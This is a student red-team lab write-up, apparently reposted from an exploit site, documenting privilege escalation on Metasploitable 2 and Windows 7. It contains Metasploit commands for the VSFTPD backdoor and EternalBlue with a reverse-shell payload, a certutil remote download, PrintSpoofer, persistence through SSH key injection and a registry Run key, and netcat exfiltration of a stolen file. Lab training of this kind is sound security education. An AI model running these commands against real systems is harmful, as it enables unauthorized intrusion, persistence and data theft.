Post_Exploitation_Privilege_Escalation

Name: Post_Exploitation_Privilege_Escalation
Rating: 5 (10 reviews)
2026-06-08 | CVSS 5.5
## https://sploitus.com/exploit?id=0576642F-69AB-5A80-ACB3-8770C8E4F8A1
# ⬆️ Week 05 — Post-Exploitation & Privilege Escalation

**Intern:** Ali Ahsan | **Roll No:** CSI-B1-427
**Program:** Cyberstar Cybersecurity Red Teaming Internship
**Instructor:** Umar Niaz
**Date:** 06 April 2026
**Targets:** Metasploitable 2 (Linux) · Windows 7

---

## 📌 Overview

This week focused on escalating privileges from low-privilege accounts to root/SYSTEM on both Linux and Windows targets, establishing persistence, and exfiltrating data — completing the post-exploitation phase of a real-world attack chain.

---

## 🧪 Tasks Covered

### Task 01 — Linux Privilege Escalation (Metasploitable)

**Initial Access via VSFTPD Backdoor:**
```bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 
exploit
```

**Shell Stabilization:**
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

**Manual Enumeration:**
```bash
sudo -l                                    # Check sudo rights
find / -perm -u=s -type f 2>/dev/null     # SUID binary search
```

**Automated Enumeration:**
- **LinPEAS** — comprehensive privilege escalation enumeration
- **LSE (Linux Smart Enumeration)** — supplementary context with verbosity level 2

### Task 02 — Windows Privilege Escalation

**EternalBlue (MS17-010):**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
```

**Token Impersonation — PrintSpoofer:**
```bash
whoami /priv                        # Confirm SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd          # Spawn SYSTEM shell
```

**Automated Enumeration:**
```bash
certutil -urlcache -f http:///winPEAS.exe winPEAS.exe
powershell -ep bypass
. .\PowerUp.ps1; Invoke-AllChecks
```

### Task 03 — Establishing Persistence

**Linux — SSH Key Injection:**
```bash
ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
```

**Windows — Registry Run Key:**
```bash
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\Users\Public\calc.exe" /f
```

### Task 04 — Data Exfiltration

**Netcat Transfer:**
```bash
# Receiver (Kali):
nc -lvnp 4444 > stolen.txt
# Sender (Target):
nc  4444 :8000/sensitive_file.txt
```

---

## 🏆 Key Accomplishments

- Escalated from `www-data` → `root` on Linux via SUID binaries
- Achieved `NT AUTHORITY\SYSTEM` on Windows 7 via EternalBlue + PrintSpoofer
- Deployed and used LinPEAS, LSE, WinPEAS, PowerUp
- Established persistent backdoors on both targets
- Successfully exfiltrated data via Netcat and Python HTTP server

---

## 🛠️ Tools Used

`Metasploit` · `LinPEAS` · `LSE` · `WinPEAS` · `PowerUp` · `PrintSpoofer` · `Netcat` · `Python HTTP Server`

---

## ⚠️ Disclaimer

> Performed in an **authorized lab environment** using Metasploitable 2 and Windows 7 VMs. For educational purposes only.